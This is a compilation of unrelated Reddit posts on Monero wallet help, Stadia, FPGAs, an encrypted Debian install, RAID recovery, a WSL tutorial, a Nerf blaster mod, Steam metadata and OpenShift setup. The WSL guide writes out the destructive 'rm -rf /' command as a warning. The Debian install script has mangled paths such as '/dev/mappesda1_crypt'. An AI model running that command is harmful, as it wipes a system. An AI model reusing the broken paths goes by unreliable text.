Transaction stuck as “pending” in the GUI
How do I move the blockchain (data.mdb) to a different directory during (or after) the initial sync without losing the progress?
I am using the GUI and my daemon doesn't start anymore
My GUI feels buggy / freezes all the time
The GUI uses all my bandwidth and I can't browse anymore or use another application that requires internet connection
How do I change the language of the 25 word mnemonic seed in the GUI or CLI?
I am using remote node, but the GUI still syncs blockchain?

Using the GUI with a remote node

In the wizard, you can either select Simple mode or Simple mode (bootstrap) to utilize this functionality. Note that the GUI developers / contributors recommend to use Simple mode (bootstrap) as this mode will eventually use your own (local) node, thereby contributing to the strength and decentralization of the network. Lastly, if you manually want to set a remote node, you ought to use Advanced mode. A guide can be found here:
https://www.getmonero.org/resources/user-guides/remote_node_gui.html

Adding a new language to the GUI

https://github.com/monero-ecosystem/monero-translations/blob/masteweblate.md
If, after reading all these guides, you still require help, please post your issue in this thread and describe it in as much detail as possible. Also, feel free to post any other guides that could help people.
submitted by dEBRUYNE_1 to Monero [link] [comments]

Allow me to explain how traditional game "patching" as on consoles and even PC by game developers is not always required for games to run better on Stadia over time... Stadia engineers can do it on their own to ever improve the visual quality of individual library titles.

I've been mulling over how to write this post without it getting too wordy and just turn people away from the topic... but I feel it's important for people to consider in regards to investing in game purchases on Stadia. Even though a years-old game is ported to Stadia by a 3rd party publisher, it is not abandoned by that developer after game engine code changes are required... at that point the Stadia team can take over tweaking the performance of the game as the Linux OS Kernel / Vulkan API / eventually hardware undergo improvements over time.
I've seen heated comments/reactions in these parts when people start noticing older games suddenly looking or performing better... even though there is no sign of a game patch from the developer or announcement that such a thing has happened. (FFXV.) I'm hear to explain how this is totally possible.
(Disclaimer: I've been a gaming platform tester for 13 years, a platform based from GenToo Linux Kernel. This year I have just branched directly into OS Kernel / Package testing itself.)
A software package / game is made up of not only game code and pretty graphics. Another fairly big piece of the puzzle is configuration files. Especially in the Linux world. Another thing about Linux is it never sits still. It's open source and ever growing and improving through constant iteration by engineers around the world. This includes the Vulkan API itself. Stadia's platform and Vulkan API has likely undergone dozens if not hundreds of iterations in the past year alone. It is CONSTANTLY improving, even if ever so slightly.
For comparison, a gaming console is a completely sealed environment. Not only does the hardware never change, but the OS and base Platform has very little wiggle room for improvement. Most significant improvements will happen within the first few years of a new console's life. But often the gains from that never spill over into the games themselves... but rather the Platform's UI interface and menu's, such as adding new features outside of the game. For things to change about a game at all, a patch MUST be delivered to the console. There is no other option, because the config files of individual games can't be touched in any other way.
On PC you often have access to these config files (at the devoloper's discretion of what they choose to expose of course). Many people know of how you can start digging into these settings and adjust number values and flip on/off flags to affect your game. But these configuration files have default values set by the developers that are expected to never really be touched by the players... so even when they do want to change something for the benefit of everyone, they need to issue a game patch.
Now on a Cloud platform such as Stadia, when a game is delivered by a developer to the platform, of course their game engine code (binaries) cannot be altered by anyone but the game developer themselves as usual... so if there is bugs in code, or game engine code improvements that can be done, the developer must deploy a game patch to make these changes, as we have seen and people would expect. However the configuration files which define how the game performs on the platform's hardware are completely exposed... and this is what the Stadia team most likely has FULL control over. So if the Vulkan API gets some improvements or code optimizations, and they can squeeze a little bit more performance out of the game, the Stadia team can go into these config files and adjust things accordingly.
Not only configurations but also the graphical assets themselves (media) can be swapped with more high-rez assets as well. Its also very possible that the publishers/devs provide Stadia with multiple different versions of quality of their media. Some higher rez textures that can be swapped in if the platform is optimized enough to handle them, etc.
Why would the Stadia team take on the management of all the games in such a way? Because it's absolutely in their best interest too. This is also a big favor towards the game publisher as well... Stadia does work to improve the game ultimately generating better reception and sales of these games producing revenue for both Stadia and the publisher.
Cloud platforms are a new animal in the gaming world. How the games are maintained over time can be done very differently than what we are used to with console and PC.
So naturally this turned into a wall of text but I couldn't do it any other way... some things simply need to be explained as clearly as possible to get across.
ltdr: As Stadia platform / Vulkan API improve constantly over time, Stadia engineers can tweak the configurations of ANY game to make them look/run better without the developers needing to be involved and patch the games.
submitted by Z3M0G to Stadia [link] [comments]

Some Background and Thoughts on FPGAs

I have been lurking on this board for a few years. I decided the other day to finally create an account so I could come out of lurk mode. As you might guess from my id I was able to retire at the beginning of this year on a significantly accelerated timetable thanks to the 20x return from my AMD stock and option investments since 2016.
I spent my career working on electronics and software for the satellite industry. We made heavy use of FPGAs and more often than not Xilinx FPGAs since they had a radiation tolerant line. I thought I would summarize some of the ways they were used in and around the development process. My experience is going to be very different than the datacenter settings in the last few years. The AI and big data stuff was a pipe dream back then.
In the olden times of the 90s we used CPUs which unlike modern processors did not include much in the way of I/O and memory controller. The computer board designs graduated from CPU + a bunch of ICs (much like the original IBM PC design) to a CPU + Xilinx FPGA + RAM + ROM and maybe a 5V or 3.3V linear voltage regulator. Those old FPGAs were programmed before they were soldered to the PCB using a dedicated programming unit attached to a PC. Pretty much the same way ROMs were programmed. At the time FPGAs gate capacity was small enough that it was still feasible to design their implementation using schematics. An engineer would draw up logic gates and flip-flops just like you would if using discrete logic ICs and then compile it to the FPGA binary and burn it to the FPGA using a programmer box like a ROM. If you screwed it up you had to buy another FPGA chip, they were not erasable. The advantage of using the FPGA is that it was common to implement a custom I/O protocol to talk to other FPGAs, on other boards, which might be operating A/D and D/A converters and digital I/O driver chips. As the FPGA gate capacities increased the overall board count could be decreased.
With the advent of much larger FPGAs that were in-circuit re-programmable they began to be used for prototyping ASIC designs. One project I worked on was developing a radiation hardened PowerPC processor ASIC with specialized I/O. A Xilinx FPGA was used to test the implementation at approximately half-speed. The PowerPC core was licensed IP and surrounded with bits that were developed in VHDL. In the satellite industry the volumes are typically not high enough to warrant developing ASICs but they could be fabbed on a rad-hard process while the time large capacity re-programmable FPGAs were not. Using FPGAs for prototyping the ASIC was essential because you only had one chance to get the ASIC right, it was cost and schedule prohibitive to do any respins.
Another way re-programmable FPGAs were used was for test equipment and ground stations. The flight hardware had these custom designed ASICs of all sorts which generally created data streams that would transmitted down from space. It was advantageous to test the boards without the full set of downlink and receiver hardware so a commercial FPGA board in a PC would be used to hook into the data bus in place of the radio. Similarly other test equipment would be made which emulated the data stream from the flight hardware so that the radio hardware could be tested independently. Finally the ground stations would often use FPGAs to pull in the digital data stream from the receiver radio and process the data in real-time. These FPGAs were typically programmed using VHDL but as tools progressed it became possible to program to program the entire PC + FPGA board combination using LabView or Simulink which also handled the UI. In the 2000s it was even possible to program a real-time software defined radio using these tools.
As FPGAs progressed they became much more sophisticated. Instead of only having to specify whether an I/O pin was digital input or output you could choose between high speed, low speed, serdes, analog etc. Instead of having to interface to external RAM chips they began to include banks of internal RAM. That is because FPGAs were no longer just gate arrays but included a quantity of "hard-core" functionality. The natural progression of FPGAs with hard cores brings them into direct competition with embedded processor SOCs. At the same time embedded SOCs have gained flexibility with I/O pin assignment which is very similar to what FPGAs allow.
It is important to understand that in the modern era of chip design the difference between the teams that AMD and Xilinx has for chip design is primarily at the architecture level. Low level design and validation are going to largely be the same (although they may be using different tools and best practices). There are going to be some synergies in process and there is going to be some flexibility in having more teams capable of bringing chips to market. They are going to be able to commingle the best practices between the two which is going to be a net boost to productivity for one side or the other or both. Furthermore AMD will have access to Xilinx FPGAs for design validation at cost and perhaps ahead of release and Xilinx will be able to leverage AMD's internal server clouds. The companies will also have access to a greater number of Fellow level architects and process gurus. Also AMD has internally developed IP blocks that Xilinx could leverage and vice versa. Going forward there would be savings on externally licensed IP blocks as well.
AI is all the rage these days but there are many other applications for generic FPGAs and for including field programmable gates in sophisticated SOCs. As the grand convergence continues I would not be surprised at all to see FPGA as much a key component to future chips as graphics are in an APU. If Moore’s law is slowing down then the ability to reconfigure the circuitry on the fly is a potential mitigation. At some point being able to reallocate the transistor budget on the fly is going to win out over adding more and more fixed functionality. Going a bit down the big.little path what if a core could be reconfigured on the fly to be integer heavy or 64 bit float heavy within the same transistor budget. Instead of dedicated video encodedecoders or AVX 512 that sits dark most of the time the OS can gin it up on demand. In a laptop or phone setting this could be a big improvement.
If anybody has questions I'd be happy to answer. I'm sure there are a number of other posters here with a background in electronics and chip design who can weigh in as well.
submitted by RetdThx2AMD to AMD_Stock [link] [comments]

Looking for suggestions to improve encrypted /boot on Debian

Below is my install procedure
# For starting from install disc: # Advanced Options -> Rescue mode -> Execute shell in Installer environment # For this example we are assuming the drive with to setup is /dev/sda # Format virtual drive to have 1 large primary partition and mark it as bootable echo -e "o\nn\np\n1\n\n\na\nw" | fdisk /dev/sda # Encrypt entire volume # Default iter is 2000 and takes 22 seconds for grub to decrypt, adjust accordingly cryptsetup -v --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 50000 --use-random --verify-passphrase luksFormat --type luks1 /dev/sda1 # or if that takes too long to type: # cryptsetup -v -c aes-xts-plain64 -s 512 -h sha512 --use-random -y luksFormat --type luks1 /dev/sda1 # Open for formating cryptsetup open /dev/sda1 sda1_crypt mkfs.xfs /dev/mappesda1_crypt # If you are doing this from a standard debian system and you don't have debootstrap run the following: # apt install -y debootstrap coreutils # bootstrap core mount /dev/mappesda1_crypt /mnt debootstrap --arch amd64 bullseye /mnt http://ftp.us.debian.org/debian/ ## If you see: # E: Invalid Release file, no entry for main/binary-$ARCH/Packages # known good values are amd64 and i386 ## It means you provided an invalid Architecture name (like x86_64 or x86) # Chroot to get to work mount -t proc none /mnt/proc mount --bind /sys /mnt/sys mount --bind /dev /mnt/dev cp /etc/resolv.conf /mnt/etc/resolv.conf chroot /mnt/ 3. Basic setup ## Optionally you can add the following lines to /etc/apt/sources.list # deb http://ftp.us.debian.org/debian bullseye main # deb-src http://ftp.us.debian.org/debian bullseye main # deb http://ftp.debian.org/debian/ bullseye-updates main # deb-src http://ftp.debian.org/debian/ bullseye-updates main # deb http://security.debian.org/ bullseye/updates main # deb-src http://security.debian.org/ bullseye/updates main # *DO NOT FORGET TO SET ROOT PASSWORD!* passwd apt update apt install -y locales debconf # For rescue mode you need to run: # export TERM=vt100 dpkg-reconfigure locales # Restore old value: # export TERM=bterm apt install -y sudo vim mg apt purge -y nano select-editor # You need to set up your /etc/fstab: echo "/dev/mappesda1_crypt\t/\txfs\tdefaults\t0\t0" > /etc/fstab # Now to inform initramfs what to pass blkid | grep '/dev/sda1:' | echo "sda1_crypt\tUUID=$(awk -F'"' '{print $2}')\tnone\tluks" > /etc/crypttab # Make sure to install grub to /dev/sdb so that you don't mess up your desktop. grep -v rootfs /proc/mounts > /etc/mtab apt install -y grub-pc linux-base linux-image-amd64 cryptsetup ## If you see: # E: Sub-process /usbin/dpkg returned an error code (1) ## Don't worry about it, we are going to fix it later # Turn on grub's support for crypto echo 'GRUB_ENABLE_CRYPTODISK=y' >> /etc/default/grub grub-mkconfig -o /boot/grub/grub.cfg grub-install /dev/sda update-initramfs -u -k all ## If you see: # cryptsetup: WARNING: Invalid source device $UUID ## You forgot to prefix UUID= before your id in /etc/crypttab *You now can reboot and finsh the rest in the system* # Since we are manually setting everything up: export HOSTNAME=concernedgnu { cat <<-EOF 127.0.0.1 localhost 127.0.1.1 $HOSTNAME # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters EOF } >| /etc/hosts # Add our first user, set their password and add them to sudo useradd -m [User] passwd [User] usermod -G sudo -a [User] chsh [User] # Fix the broken packages apt install -f # Turn on network so we can add packages dhclient # Install posix standard tools apt update tasksel install standard # Add network-manger apt install -y network-manager nmtui # Remove need to type luks password twice dd bs=512 count=4 if=/dev/urandom of=/crypto_keyfile.bin chmod 400 /crypto_keyfile.bin cryptsetup luksAddKey /dev/sda1 /crypto_keyfile.bin # in /etc/crypttab replace none with /crypto_keyfile.bin blkid | grep '/dev/sda1:' | echo -e "sda1_crypt\tUUID=$(awk -F'"' '{print $2}')\t/crypto_keyfile.bin\tluks,keyscript=file" > /etc/crypttab # create /usshare/initramfs-tools/hooks/file (750 permissions) with the below content: :::::::::::::: START :::::::::::::: #!/bin/bash set -e PREREQ="cryptroot" prereqs() { echo "$PREREQ" } case $1 in prereqs) prereqs exit 0 ;; esac . /usshare/initramfs-tools/hook-functions # Hooks for loading keyctl software into the initramfs copy_exec /crypto_keyfile.bin exit 0 :::::::::::::: END :::::::::::::: chmod 750 /usshare/initramfs-tools/hooks/file # and then create it's match in /lib/cryptsetup/scripts/file (750 permissions) with the following content: :::::::::::::: START :::::::::::::: #!/bin/sh decrypt_file () { cat "$1" return 0 } if [ -z "$1" ]; then echo "$0: missing key as argument" >&2 exit 1 fi decrypt_file "$1" exit $? :::::::::::::: END :::::::::::::: chmod 750 /lib/cryptsetup/scripts/file update-initramfs -u -k all # You can verify that the keyfile and /lib/cryptsetup/scripts/file are both in the initrd with: lsinitramfs /boot/initrd.img-* | less *You may now logout and finish the rest as user* # Install Desktop utils if required sudo apt install -y xinit slim i3-wm dmenu x11-xserver-utils # If you skipped the guix option for space reasons: # sudo apt install -y gpg rxvt-unicode emacs git tig most firefox-esr 
submitted by concernedgnu20190124 to linuxadmin [link] [comments]

Help with RAID 6 recovery

Back around 2008, I built a machine with a 3ware RAID controller, and set up 15 1TB drives in RAID 6.
At some point in maybe 2010, I had 3 (or maybe only 2) drives fail due to (most likely) overheating. I was unable to rebuild the array at the time, even with swapping out the failed drive/s. I don't remember the details.
More than a decade later, I still have all 15 drives, in a box, labeled with their order, and the original 3ware controller, and a desiccant pack.
I have no idea if the drives still work, but I am finally ready to try to recover the data from them, assuming they still work.
After a bit of duckduckgo-ing, it appears that I really only have 2 options - use recovery software or use a recovery service where I ship out my drives. The data on these drives, while nice to have, is not worth me sending them to a 3rd party. I am, however, willing to spend a little money on the recovery software if I need to.
Based on my searching, it appears that there are 3 viable options: * https://www.diskinternals.com/raid-recovery/ * https://www.stellarinfo.com/article/raid6-data-recovery.php * http://www.freeraidrecovery.com/
The Diskinternals solution looks like it may be the easiest, but I'm not sure what to expect when I actually try to use it.
The Stellar one looks good as well - it has instructions with screenshots and I was able to find a video of someone actually using it. But it needs some technical parameters that I have no idea how to retrieve - maybe I could hook up the old controller and read them by accessing the controller from the bios? I will try that once I'm ready to get my hands dirty.
The ReclaiMe one appears to be easy and free, claiming that it will automatically determine the parameters that Stellar expects you to supply. Seems too good to be true, especially as a free product. Their site and their claims make me not trust them...
So to get started on this project, the very first thing I want to do is take some kind of image of each of the 15 drives. Do any of you have recommendations for the best way to do this? The first step in Diskinternals instructions (which are on this separate page for some reason - https://www.diskinternals.com/raid-recovery/raid-6-data-recovery/) list creating a "binary image" of the disk/s. Once I do this, then do I need to mount it somehow? Do I need some separate program to do that in Windows? I know that I can (and will) look this up, but taking an image of known corrupted drives for the purposes of RAID data recovery with specialized recovery software seems to be a pretty special case, and I want to make sure that the image I take is what will be needed to attempt the recovery. I don't know how many times I'll be able to read from these old drives.
I did a little searching before posting this about disk imaging/cloning - it seems like I need an image, not a clone. Clonezilla looks like the best option (and I've used it before). I've heard good things about Acronis, but their new pricing model turns me off. Most of the alternatives to Clonezilla (Acronis, Paragon, Macrium) don't have technical-enough language to earn my trust. I also took a look at isobuster, because that's a program I already have, but it looks like its ability to take raw images does not include HDDs.
A quick search of datahoarder using the search term "raid 6" didn't bring up any posts that had addressed this scenario - most were about swapping/rebuilding.
Any help, guidance, insight, etc. is appreciated. Thanks!
submitted by brainthinks to DataHoarder [link] [comments]

An introduction to Linux through Windows Subsystem for Linux

I'm working as an Undergraduate Learning Assistant and wrote this guide to help out students who were in the same boat I was in when I first took my university's intro to computer science course. It provides an overview of how to get started using Linux, guides you through setting up Windows Subsystem for Linux to run smoothly on Windows 10, and provides a very basic introduction to Linux. Students seemed to dig it, so I figured it'd help some people in here as well. I've never posted here before, so apologies if I'm unknowingly violating subreddit rules.

An introduction to Linux through Windows Subsystem for Linux

GitHub Pages link

Introduction and motivation

tl;dr skip to next section
So you're thinking of installing a Linux distribution, and are unsure where to start. Or you're an unfortunate soul using Windows 10 in CPSC 201. Either way, this guide is for you. In this section I'll give a very basic intro to some of options you've got at your disposal, and explain why I chose Windows Subsystem for Linux among them. All of these have plenty of documentation online so Google if in doubt.

Setting up WSL

So if you've read this far I've convinced you to use WSL. Let's get started with setting it up. The very basics are outlined in Microsoft's guide here, I'll be covering what they talk about and diving into some other stuff.

1. Installing WSL

Press the Windows key (henceforth Winkey) and type in PowerShell. Right-click the icon and select run as administrator. Next, paste in this command:
dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart 
Now you'll want to perform a hard shutdown on your computer. This can become unecessarily complicated because of Window's fast startup feature, but here we go. First try pressing the Winkey, clicking on the power icon, and selecting Shut Down while holding down the shift key. Let go of the shift key and the mouse, and let it shutdown. Great! Now open up Command Prompt and type in
wsl --help 
If you get a large text output, WSL has been successfully enabled on your machine. If nothing happens, your computer failed at performing a hard shutdown, in which case you can try the age-old technique of just holding down your computer's power button until the computer turns itself off. Make sure you don't have any unsaved documents open when you do this.

2. Installing Ubuntu

Great! Now that you've got WSL installed, let's download a Linux distro. Press the Winkey and type in Microsoft Store. Now use the store's search icon and type in Ubuntu. Ubuntu is a Debian-based Linux distribution, and seems to have the best integration with WSL, so that's what we'll be going for. If you want to be quirky, here are some other options. Once you type in Ubuntu three options should pop up: Ubuntu, Ubuntu 20.04 LTS, and Ubuntu 18.04 LTS.
![Windows Store](https://theshepord.github.io/intro-to-WSL/docs/images/winstore.png) Installing plain-old "Ubuntu" will mean the app updates whenever a new major Ubuntu distribution is released. The current version (as of 09/02/2020) is Ubuntu 20.04.1 LTS. The other two are older distributions of Ubuntu. For most use-cases, i.e. unless you're running some software that will break when upgrading, you'll want to pick the regular Ubuntu option. That's what I did.
Once that's done installing, again hit Winkey and open up Ubuntu. A console window should open up, asking you to wait a minute or two for files to de-compress and be stored on your PC. All future launches should take less than a second. It'll then prompt you to create a username and password. I'd recommend sticking to whatever your Windows username and password is so that you don't have to juggle around two different usepassword combinations, but up to you.
Finally, to upgrade all your packages, type in
sudo apt-get update 
And then
sudo apt-get upgrade 
apt-get is the Ubuntu package manager, this is what you'll be using to install additional programs on WSL.

3. Making things nice and crispy: an introduction to UNIX-based filesystems

tl;dr skip to the next section
The two above steps are technically all you need for running WSL on your system. However, you may notice that whenever you open up the Ubuntu app your current folder seems to be completely random. If you type in pwd (for Print Working Directory, 'directory' is synonymous with 'folder') inside Ubuntu and hit enter, you'll likely get some output akin to /home/. Where is this folder? Is it my home folder? Type in ls (for LiSt) to see what files are in this folder. Probably you won't get any output, because surprise surprise this folder is not your Windows home folder and is in fact empty (okay it's actually not empty, which we'll see in a bit. If you type in ls -a, a for All, you'll see other files but notice they have a period in front of them. This is a convention for specifying files that should be hidden by default, and ls, as well as most other commands, will honor this convention. Anyways).
So where is my Windows home folder? Is WSL completely separate from Windows? Nope! This is Windows Subsystem for Linux after all. Notice how, when you typed pwd earlier, the address you got was /home/. Notice that forward-slash right before home. That forward-slash indicates the root directory (not to be confused with the /root directory), which is the directory at the top of the directory hierarchy and contains all other directories in your system. So if we type ls /, you'll see what are the top-most directories in your system. Okay, great. They have a bunch of seemingly random names. Except, shocker, they aren't random. I've provided a quick run-down in Appendix A.
For now, though, we'll focus on /mnt, which stands for mount. This is where your C drive, which contains all your Windows stuff, is mounted. So if you type ls /mnt/c, you'll begin to notice some familiar folders. Type in ls /mnt/c/Users, and voilà, there's your Windows home folder. Remember this filepath, /mnt/c/Users/. When we open up Ubuntu, we don't want it tossing us in this random /home/ directory, we want our Windows home folder. Let's change that!

4. Changing your default home folder

Type in sudo vim /etc/passwd. You'll likely be prompted for your Ubuntu's password. sudo is a command that gives you root privileges in bash (akin to Windows's right-click then selecting 'Run as administrator'). vim is a command-line text-editing tool, which out-of-the-box functions kind of like a crummy Notepad (you can customize it infinitely though, and some people have insane vim setups. Appendix B has more info). /etc/passwd is a plaintext file that historically was used to store passwords back when encryption wasn't a big deal, but now instead stores essential user info used every time you open up WSL.
Anyway, once you've typed that in, your shell should look something like this: ![vim /etc/passwd](https://theshepord.github.io/intro-to-WSL/docs/images/vim-etc-passwd.png)
Using arrow-keys, find the entry that begins with your Ubuntu username. It should be towards the bottom of the file. In my case, the line looks like
theshep:x:1000:1000:,,,:/home/pizzatron3000:/bin/bash 
See that cringy, crummy /home/pizzatron3000? Not only do I regret that username to this day, it's also not where we want our home directory. Let's change that! Press i to initiate vim's -- INSERT -- mode. Use arrow-keys to navigate to that section, and delete /home/ by holding down backspace. Remember that filepath I asked you to remember? /mnt/c/Users/. Type that in. For me, the line now looks like
theshep:x:1000:1000:,,,:/mnt/c/Users/lucas:/bin/bash 
Next, press esc to exit insert mode, then type in the following:
:wq 
The : tells vim you're inputting a command, w means write, and q means quit. If you've screwed up any of the above sections, you can also type in :q! to exit vim without saving the file. Just remember to exit insert mode by pressing esc before inputting commands, else you'll instead be writing to the file.
Great! If you now open up a new terminal and type in pwd, you should be in your Window's home folder! However, things seem to be lacking their usual color...

5. Importing your configuration files into the new home directory

Your home folder contains all your Ubuntu and bash configuration files. However, since we just changed the home folder to your Window's home folder, we've lost these configuration files. Let's bring them back! These configuration files are hidden inside /home/, and they all start with a . in front of the filename. So let's copy them over into your new home directory! Type in the following:
cp -r /home//. ~ 
cp stands for CoPy, -r stands for recursive (i.e. descend into directories), the . at the end is cp-specific syntax that lets it copy anything, including hidden files, and the ~ is a quick way of writing your home directory's filepath (which would be /mnt/c/Users/) without having to type all that in again. Once you've run this, all your configuration files should now be present in your new home directory. Configuration files like .bashrc, .profile, and .bash_profile essentially provide commands that are run whenever you open a new shell. So now, if you open a new shell, everything should be working normally. Amazing. We're done!

6. Tips & tricks

Here are two handy commands you can add to your .profile file. Run vim ~/.profile, then, type these in at the top of the .profile file, one per line, using the commands we discussed previously (i to enter insert mode, esc to exit insert mode, :wq to save and quit).
alias rm='rm -i' makes it so that the rm command will always ask for confirmation when you're deleting a file. rm, for ReMove, is like a Windows delete except literally permanent and you will lose that data for good, so it's nice to have this extra safeguard. You can type rm -f to bypass. Linux can be super powerful, but with great power comes great responsibility. NEVER NEVER NEVER type in rm -rf /, this is saying 'delete literally everything and don't ask for confirmation', your computer will die. Newer versions of rm fail when you type this in, but don't push your luck. You've been warned. Be careful.
export DISPLAY=:0 if you install XLaunch VcXsrv, this line allows you to open graphical interfaces through Ubuntu. The export sets the environment variable DISPLAY, and the :0 tells Ubuntu that it should use the localhost display.

Appendix A: brief intro to top-level UNIX directories

tl;dr only mess with /mnt, /home, and maybe maybe /usr. Don't touch anything else.
  • bin: binaries, contains Ubuntu binary (aka executable) files that are used in bash. Here you'll find the binaries that execute commands like ls and pwd. Similar to /usbin, but bin gets loaded earlier in the booting process so it contains the most important commands.
  • boot: contains information for operating system booting. Empty in WSL, because WSL isn't an operating system.
  • dev: devices, provides files that allow Ubuntu to communicate with I/O devices. One useful file here is /dev/null, which is basically an information black hole that automatically deletes any data you pass it.
  • etc: no idea why it's called etc, but it contains system-wide configuration files
  • home: equivalent to Window's C:/Users folder, contains home folders for the different users. In an Ubuntu system, under /home/ you'd find the Documents folder, Downloads folder, etc.
  • lib: libraries used by the system
  • lib64 64-bit libraries used by the system
  • mnt: mount, where your drives are located
  • opt: third-party applications that (usually) don't have any dependencies outside the scope of their own package
  • proc: process information, contains runtime information about your system (e.g. memory, mounted devices, hardware configurations, etc)
  • run: directory for programs to store runtime information.
  • srv: server folder, holds data to be served in protocols like ftp, www, cvs, and others
  • sys: system, provides information about different I/O devices to the Linux Kernel. If dev files allows you to access I/O devices, sys files tells you information about these devices.
  • tmp: temporary, these are system runtime files that are (in most Linux distros) cleared out after every reboot. It's also sort of deprecated for security reasons, and programs will generally prefer to use run.
  • usr: contains additional UNIX commands, header files for compiling C programs, among other things. Kind of like bin but for less important programs. Most of everything you install using apt-get ends up here.
  • var: variable, contains variable data such as logs, databases, e-mail etc, but that persist across different boots.
Also keep in mind that all of this is just convention. No Linux distribution needs to follow this file structure, and in fact almost all will deviate from what I just described. Hell, you could make your own Linux fork where /mnt/c information is stored in tmp.

Appendix B: random resources

EDIT: implemented various changes suggested in the comments. Thanks all!
submitted by HeavenBuilder to linux4noobs [link] [comments]

"From the Transistor to the Web Browser" George Hotz CS Curriculum

Found this on George Hotz's Github. Thinking of following this curriculum to get into CS. Would love to know everyone's thoughts. The only thing this curriculum lacks is links and resources.

Credit: https://github.com/geohot/fromthetransistor
"Hiring is hard, a lot of modern CS education is really bad, and it's hard to find people who understand the modern computer stack from first principles.
Now cleaned up and going to be software only. Closer to being real.

Section 1: Intro: Cheating our way past the transistor -- 0.5 weeks

Section 2: Bringup: What language is hardware coded in? -- 0.5 weeks

Section 3: Processor: What is a processor anyway? -- 3 weeks

Section 4: Compiler: A “high” level language -- 3 weeks

Section 5: Operating System: Software we take for granted -- 3 weeks

Section 6: Browser: Coming online -- 1 week

Section 7: Physical: Running on real hardware -- 1 week

submitted by Cyandemption to cscareerquestions [link] [comments]

HPA FDL-3 "WTFDL-3" | Select Fire | Variable FPS, DPS, pressure

HPA FDL-3
I had a Super Core lying about collecting dust, but I really felt in the mood to build myself a new FDL-3... The problem is that FDL's are flywheelers, and to be honest, I already have 4 of them.. And so what would any self respecting Nerfer do in my position? Mod. And mod I did...

Virtually every part of the FDL has been modified to make this work. Some parts are obvious and quite extensive - such as installing a Super Core and air system where you had a pusher and electronics, and the creation of a matching bottle stock.. But other parts were less so.. Such as changing the position of the magazine within the magwell, adjusting the mag release components to suit, realignment of screw holes and wiring runs.. That sort of thing.. Plus with the massive cantilevered barrel and air bottle, a lot of design has gone into ensuring that the blaster can support it while surviving the crucible of war. Maybe 4 or 5 minor pieces are untouched.

But it's not enough to just chuck in some HPA components - in the spirit of the FDL, it has to be teched out, fully configurable, and per my more recent builds, closed loop. This brings us to the crux of the matter, it has the following features:
  • Narfduino with OLED console
  • Software controlled air pressure (i.e. turn the dial for more or less power)
  • Variable FPS configured separately for Auto and Burst
  • Select fire - Semi-auto, burst, full auto, binary trigger, and ramped (you map the modes you want to the buttons in the config screen) and a range of configuration options for each
  • Dual profile settings
  • Ammo counter with reset on mag change
  • Tournament lock to cap the maximum air pressure
  • Auto jam detection / air out, and battery protection
  • Open-bolt configuration
  • Spectre composite barrel and acetal scar

The closed loop control system allows for the variable air pressure, plus it also monitors the internal pressure to detect the optimum time to fire and vent the core. The regulator is set to about 110 - 120 psi and you get increadibly quick charge times. This helps the system run faster than the magazine follower and you can effectively run whatever DPS you want - with the blaster turning it down as the bottle starts getting close to empty.

So far the maximum I have gotten out of this setup was a shade over 420fps, and the minimum was just under 50fps. It's very stable and reliable in the 200 - 300 range.

Demo video: https://youtu.be/CM311Xk63Wc

Pics:

The blaster
Compared to one of my other FDL-3's
FDL-3 with an air tank
Family photo
Family photo
Family photo
Turned up to '11'
Turned down to 'Jolt'
Pics for mobile: https://imgur.com/a/V4Xp4oH
submitted by airzonesama to Nerf [link] [comments]

Anybody knows how to stop Steam from updating the appinfo.vdf file on startup?

Hi. I'm trying to create a clone of Steam Edit for Linux. The application works by modifying the appinfo.vdf file located in steam/appcache/appinfo.vdf. This lets you edit basically all the metadata of the game, name, genres, tags, and most importantly launch options, which is handy to set up modded/vanilla installations.
I found a library that lets me edit the file, which is cool since it's a binary file. However, whenever I edit the file, Steam reverts the changes on startup with the "Updating steam configuration" dialogue.
I have no idea on how to make this not happen. Steam Edit has a "Apply and refresh" button which closes Steam and reopens it without modifying the file, and the changes stay until Steam decides to update it because of new games or whatever. However, Steam Edit is closed source so I have no way to see how it does it, and upon contacting the developer they don't seem too eager to talk about it.
I tried to use the -noverifyfileslaunch parameter but it updated it anyway.
So... ideas? Or a better place to post this? I really doubt I'll find much help here but anything would be helpful. Thanks.
submitted by SnooPets20 to Steam [link] [comments]

Red Hat OpenShift Container Platform Instruction Manual for Windows Powershell

Introduction to the manual
This manual is made to guide you step by step in setting up an OpenShift cloud environment on your own device. It will tell you what needs to be done, when it needs to be done, what you will be doing and why you will be doing it, all in one convenient manual that is made for Windows users. Although if you'd want to try it on Linux or MacOS we did add the commands necesary to get the CodeReady Containers to run on your operating system. Be warned however there are some system requirements that are necessary to run the CodeReady Containers that we will be using. These requirements are specified within chapter Minimum system requirements.
This manual is written for everyone with an interest in the Red Hat OpenShift Container Platform and has at least a basic understanding of the command line within PowerShell on Windows. Even though it is possible to use most of the manual for Linux or MacOS we will focus on how to do this within Windows.
If you follow this manual you will be able to do the following items by yourself:
● Installing the CodeReady Containers
● Updating OpenShift
● Configuring a CodeReady Container
● Configuring the DNS
● Accessing the OpenShift cluster
● Deploying the Mediawiki application
What is the OpenShift Container platform?
Red Hat OpenShift is a cloud development Platform as a Service (PaaS). It enables developers to develop and deploy their applications on a cloud infrastructure. It is based on the Kubernetes platform and is widely used by developers and IT operations worldwide. The OpenShift Container platform makes use of CodeReady Containers. CodeReady Containers are pre-configured containers that can be used for developing and testing purposes. There are also CodeReady Workspaces, these workspaces are used to provide any member of the development or IT team with a consistent, secure, and zero-configuration development environment.
The OpenShift Container Platform is widely used because it helps the programmers and developers make their application faster because of CodeReady Containers and CodeReady Workspaces and it also allows them to test their application in the same environment. One of the advantages provided by OpenShift is the efficient container orchestration. This allows for faster container provisioning, deploying and management. It does this by streamlining and automating the automation process.
What knowledge is required or recommended to proceed with the installation?
To be able to follow this manual some knowledge is mandatory, because most of the commands are done within the Command Line interface it is necessary to know how it works and how you can browse through files/folders. If you either don’t have this basic knowledge or have trouble with the basic Command Line Interface commands from PowerShell, then a cheat sheet might offer some help. We recommend the following cheat sheet for windows:
Https://www.sans.org/security-resources/sec560/windows\_command\_line\_sheet\_v1.pdf
Another option is to read through the operating system’s documentation or introduction guides. Though the documentation can be overwhelming by the sheer amount of commands.
Microsoft: https://docs.microsoft.com/en-us/windows-serveadministration/windows-commands/windows-commands
MacOS
Https://www.makeuseof.com/tag/mac-terminal-commands-cheat-sheet/
Linux
